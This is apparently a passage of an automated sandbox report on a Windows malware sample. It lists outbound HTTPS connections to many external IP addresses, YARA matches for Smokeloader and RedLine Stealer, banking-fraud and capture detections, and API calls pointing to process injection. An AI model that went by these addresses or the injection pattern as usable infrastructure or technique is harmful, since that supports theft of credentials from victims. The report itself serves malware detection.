                                Source: unknownNetwork traffic detected: HTTP traffic on port 50608 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 53560 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51449
                                Source: unknownNetwork traffic detected: HTTP traffic on port 55770 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50912
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50914
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55801
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55802
                                Source: unknownNetwork traffic detected: HTTP traffic on port 53908 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 52962 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54377 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54759 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55491
                                Source: unknownNetwork traffic detected: HTTP traffic on port 55456 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 51722 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 55943 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54607
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50912 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 51384 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54782 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 51472 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 55822 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53997
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54601
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54600
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54383 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 53828 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 52797 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54907 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54267 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 55772 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54452 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53808
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54446 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55667
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50315 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 51432 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50943 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 51449 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54462
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50972 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54661 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 55683 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50905 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53809
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54667 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 55689 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 55700 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54907
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54905
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52960
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51512
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52962
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54762 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55683
                                Source: unknownNetwork traffic detected: HTTP traffic on port 53574 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54471
                                Source: unknownNetwork traffic detected: HTTP traffic on port 52873 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54601 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 55491 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50315
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53826
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50984 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53828
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55689
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53025
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54113
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53023
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55688
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54364
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54120
                                Source: unknownNetwork traffic detected: HTTP traffic on port 51290 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54600 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50446
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54244
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53832
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53039
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55456
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53040
                                Source: unknownNetwork traffic detected: HTTP traffic on port 55596 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53041
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54372
                                Source: unknownNetwork traffic detected: HTTP traffic on port 55667 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 53023 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 53040 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 55942 -> 443
                                Source: unknownHTTPS traffic detected: 104.21.45.142:443 -> 192.168.2.4:49753 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.88.149:443 -> 192.168.2.4:49754 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 62.109.151.15:443 -> 192.168.2.4:50446 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 23.239.22.202:443 -> 192.168.2.4:50904 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.230.253.85:443 -> 192.168.2.4:50623 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 62.109.151.15:443 -> 192.168.2.4:50943 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 92.240.253.3:443 -> 192.168.2.4:50315 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 141.98.102.194:443 -> 192.168.2.4:50608 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 23.236.62.147:443 -> 192.168.2.4:50940 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 37.9.175.188:443 -> 192.168.2.4:51055 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 141.98.102.194:443 -> 192.168.2.4:50931 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 37.9.175.188:443 -> 192.168.2.4:51056 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 23.239.22.202:443 -> 192.168.2.4:51472 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.230.253.85:443 -> 192.168.2.4:50905 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 85.248.129.35:443 -> 192.168.2.4:51384 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 46.229.230.4:443 -> 192.168.2.4:50972 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 46.229.230.4:443 -> 192.168.2.4:50973 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 162.43.104.145:443 -> 192.168.2.4:51449 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 162.43.104.145:443 -> 192.168.2.4:51432 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 46.229.230.4:443 -> 192.168.2.4:50980 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 185.32.160.10:443 -> 192.168.2.4:50974 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 46.229.230.4:443 -> 192.168.2.4:50984 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 92.240.253.3:443 -> 192.168.2.4:51292 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 141.98.102.194:443 -> 192.168.2.4:51290 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 217.26.54.21:443 -> 192.168.2.4:51702 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 185.32.160.10:443 -> 192.168.2.4:51486 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:51512 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 81.0.206.104:443 -> 192.168.2.4:51705 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 46.229.230.106:443 -> 192.168.2.4:51813 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 59.106.13.82:443 -> 192.168.2.4:51725 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 59.106.13.82:443 -> 192.168.2.4:51722 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:52804 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 81.0.206.104:443 -> 192.168.2.4:52797 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:52802 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:52807 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:52810 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:52813 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:52873 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:52879 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 37.9.175.180:443 -> 192.168.2.4:53039 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 64.190.63.111:443 -> 192.168.2.4:53025 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 64.190.63.111:443 -> 192.168.2.4:53023 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 37.9.175.180:443 -> 192.168.2.4:53041 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:53040 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.152.228:443 -> 192.168.2.4:53577 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 35.190.10.69:443 -> 192.168.2.4:53574 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 89.46.109.20:443 -> 192.168.2.4:53595 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 86.107.32.130:443 -> 192.168.2.4:53797 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 187.45.195.138:443 -> 192.168.2.4:53557 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 89.46.109.20:443 -> 192.168.2.4:53808 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 93.185.102.224:443 -> 192.168.2.4:53828 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 86.107.32.130:443 -> 192.168.2.4:53826 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 93.185.102.224:443 -> 192.168.2.4:53809 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 35.190.10.69:443 -> 192.168.2.4:53908 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 93.184.77.21:443 -> 192.168.2.4:53792 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 93.184.77.21:443 -> 192.168.2.4:53793 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 157.205.193.125:443 -> 192.168.2.4:53560 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 85.248.129.35:443 -> 192.168.2.4:53997 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 68.233.46.109:443 -> 192.168.2.4:54318 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 50.116.86.49:443 -> 192.168.2.4:54372 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 50.116.86.49:443 -> 192.168.2.4:54377 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:53832 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 164.46.93.189:443 -> 192.168.2.4:54120 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 157.205.193.125:443 -> 192.168.2.4:53796 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 89.161.228.119:443 -> 192.168.2.4:54244 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 193.163.77.6:443 -> 192.168.2.4:54382 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 193.163.77.6:443 -> 192.168.2.4:54383 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 85.248.130.200:443 -> 192.168.2.4:54452 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 164.46.121.63:443 -> 192.168.2.4:54412 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 85.248.130.200:443 -> 192.168.2.4:54462 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 164.46.121.63:443 -> 192.168.2.4:54416 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 46.229.230.107:443 -> 192.168.2.4:54113 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 92.240.253.14:443 -> 192.168.2.4:54364 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 46.229.230.81:443 -> 192.168.2.4:54446 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 46.229.230.81:443 -> 192.168.2.4:54448 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:54442 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 66.97.32.25:443 -> 192.168.2.4:54471 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 46.229.230.40:443 -> 192.168.2.4:54513 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 89.46.109.48:443 -> 192.168.2.4:54657 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 89.46.109.48:443 -> 192.168.2.4:54661 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 89.46.109.48:443 -> 192.168.2.4:54670 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 89.46.109.48:443 -> 192.168.2.4:54667 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 89.46.109.48:443 -> 192.168.2.4:54664 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 178.238.43.210:443 -> 192.168.2.4:54762 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 178.238.43.210:443 -> 192.168.2.4:54759 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 92.240.253.3:443 -> 192.168.2.4:54794 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 81.0.206.104:443 -> 192.168.2.4:54782 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 81.0.206.104:443 -> 192.168.2.4:54793 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:54905 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:54907 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.152.228:443 -> 192.168.2.4:55456 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 23.239.22.202:443 -> 192.168.2.4:55531 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 35.190.10.69:443 -> 192.168.2.4:55491 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 217.26.54.21:443 -> 192.168.2.4:55596 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 23.239.22.202:443 -> 192.168.2.4:55667 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 23.239.22.202:443 -> 192.168.2.4:55689 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:55771 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:55772 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:55770 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 37.9.175.180:443 -> 192.168.2.4:55700 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 37.9.175.180:443 -> 192.168.2.4:55688 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 162.43.104.145:443 -> 192.168.2.4:55683 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 66.97.32.25:443 -> 192.168.2.4:55802 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 83.167.249.7:443 -> 192.168.2.4:55801 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 93.185.102.224:443 -> 192.168.2.4:55942 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 93.185.102.224:443 -> 192.168.2.4:55943 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 89.161.228.119:443 -> 192.168.2.4:55944 version: TLS 1.2

                                Key, Mouse, Clipboard, Microphone and Screen Capturing

                                barindex
                                Source: Yara matchFile source: 3.2.wesswwi.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 17.3.CA06.exe.890000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 43.3.gwsswwi.25e0000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.3.wesswwi.910000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.ZRgv8wdMtR.exe.2480e67.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 43.2.gwsswwi.25d0e67.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.3.ZRgv8wdMtR.exe.2490000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 17.2.CA06.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.wesswwi.900e67.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 17.2.CA06.exe.880e67.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 43.2.gwsswwi.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.ZRgv8wdMtR.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000002.1711385659.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.1951376961.0000000000A11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000011.00000002.2192095995.0000000000A11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1645990983.0000000002490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002B.00000003.2405200857.00000000025E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.1951330825.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002B.00000002.2458238302.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000011.00000002.2190393639.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.1900431911.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002B.00000002.2457876157.00000000025E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.1711348411.00000000024A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000011.00000003.2133195697.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                                E-Banking Fraud

                                barindex
                                Source: Yara matchFile source: 21.1.E36B.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 42.2.E36B.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 42.1.E36B.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 40.2.E36B.exe.2d515a0.7.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.E36B.exe.400000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.E36B.exe.2dd15a0.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000002A.00000002.3052219524.0000000000843000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.2204215062.0000000003213000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000001.2299335069.0000000000843000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000001.2202228549.0000000000843000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.2293956463.0000000000843000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000028.00000002.2310762272.0000000003193000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                                System Summary

                                barindex
                                Source: 11.0.B013.exe.dc0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
                                Source: 00000000.00000002.1711385659.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                                Source: 00000003.00000002.1951376961.0000000000A11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                                Source: 00000003.00000002.1951315061.0000000000900000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                                Source: 00000000.00000002.1711305069.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                                Source: 00000011.00000002.2192095995.0000000000A11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                                Source: 0000002B.00000002.2457824291.00000000025D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                                Source: 00000012.00000002.2203867401.00000000029CB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                                Source: 00000003.00000002.1951330825.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                                Source: 0000002B.00000002.2458238302.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                                Source: 00000013.00000002.2197119051.0000000002C00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                                Source: 00000028.00000002.2308952189.0000000002952000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                                Source: 00000006.00000002.1999543598.00000000026CE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                                Source: 00000011.00000002.2190393639.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                                Source: 00000011.00000002.2192940256.0000000000A49000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                                Source: 0000002B.00000002.2457876157.00000000025E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                                Source: 00000000.00000002.1711095054.0000000000969000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                                Source: 00000003.00000002.1951442963.0000000000A68000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                                Source: 00000011.00000002.2189728450.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                                Source: 0000002B.00000002.2457438391.0000000000909000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                                Source: 00000000.00000002.1711348411.00000000024A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                                Source: 0000000E.00000002.2113842934.0000000002C00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                                Source: C:\Users\user\AppData\Local\Temp\B013.exe, type: DROPPEDMatched rule: Detects executables packed with unregistered version of .NET Reactor Author: ditekSHen
                                Source: B013.exe.1.drStatic PE information: section name:
                                Source: is-M3SQC.tmp.30.drStatic PE information: section name:
                                Source: is-M3SQC.tmp.30.drStatic PE information: section name:
                                Source: is-HI55A.tmp.30.drStatic PE information: section name:
                                Source: is-HI55A.tmp.30.drStatic PE information: section name:
                                Source: is-M5NA9.tmp.30.drStatic PE information: section name:
                                Source: is-M5NA9.tmp.30.drStatic PE information: section name:
                                Source: is-GR4AC.tmp.30.drStatic PE information: section name:
                                Source: is-LN8F3.tmp.30.drStatic PE information: section name:
                                Source: is-LN8F3.tmp.30.drStatic PE information: section name:
                                Source: is-N5KRR.tmp.30.drStatic PE information: section name:
                                Source: is-N5KRR.tmp.30.drStatic PE information: section name:
                                Source: is-CJH5R.tmp.30.drStatic PE information: section name:
                                Source: is-B8UB5.tmp.30.drStatic PE information: section name:
                                Source: is-B8UB5.tmp.30.drStatic PE information: section name:
                                Source: is-B8UB5.tmp.30.drStatic PE information: section name:
                                Source: is-CV65T.tmp.30.drStatic PE information: section name:
                                Source: is-CV65T.tmp.30.drStatic PE information: section name:
                                Source: is-9EJD1.tmp.30.drStatic PE information: section name:
                                Source: is-9EJD1.tmp.30.drStatic PE information: section name:
                                Source: is-9EJD1.tmp.30.drStatic PE information: section name:
                                Source: is-N5RMT.tmp.30.drStatic PE information: section name:
                                Source: is-N5RMT.tmp.30.drStatic PE information: section name:
                                Source: is-8RC7G.tmp.30.drStatic PE information: section name:
                                Source: is-8RC7G.tmp.30.drStatic PE information: section name:
                                Source: is-SK9ML.tmp.30.drStatic PE information: section name:
                                Source: is-SK9ML.tmp.30.drStatic PE information: section name:
                                Source: is-SK9ML.tmp.30.drStatic PE information: section name:
                                Source: is-JNRFN.tmp.30.drStatic PE information: section name:
                                Source: is-JNRFN.tmp.30.drStatic PE information: section name:
                                Source: is-ARAOP.tmp.30.drStatic PE information: section name:
                                Source: is-ARAOP.tmp.30.drStatic PE information: section name:
                                Source: is-ARAOP.tmp.30.drStatic PE information: section name:
                                Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeCode function: 0_2_00401590 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,LocalAlloc,NtMapViewOfSection,VirtualProtect,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401590
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeCode function: 0_2_004015CB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,LocalAlloc,NtMapViewOfSection,VirtualProtect,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015CB
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeCode function: 0_2_0040159B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,LocalAlloc,NtMapViewOfSection,VirtualProtect,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040159B
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeCode function: 0_2_004015B0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,LocalAlloc,NtMapViewOfSection,VirtualProtect,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015B0
                                Source: C:\Users\user\Desktop\ZRgv8wdMtR.exeCode function: 0_2_004015BC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,LocalAlloc,NtMapViewOfSection,VirtualProtect,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015BC
                                Source: C:\Users\user\AppData\Roaming\wesswwiCode function: 3_2_00401590 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,LocalAlloc,NtMapViewOfSection,VirtualProtect,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,3_2_00401590
